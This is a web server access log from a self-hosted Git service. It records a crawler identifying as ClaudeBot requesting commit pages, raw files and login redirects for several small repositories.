"/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 216.73.216.188] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates%2Findex.html" [Client 216.73.216.188] [Length 31832] [Gzip 7.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fstatic%2Fjs" [Client 216.73.216.188] [Length 37490] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fassets%2Fjs" [Client 216.73.216.188] [Length 48029] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fjs" [Client 216.73.216.188] [Length 24638] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10902] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 216.73.216.188] [Length 10322] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11958] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcConnectionTest" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Ftemplates%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Fcalculator.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11065] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2Fassets%2Fjs" [Client 216.73.216.188] [Length 22230] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FTestService.csproj" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FProperties" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4845] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2Fassets%2Fjs" [Client 216.73.216.188] [Length 19251] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj%2FTestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FWorker.cs" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 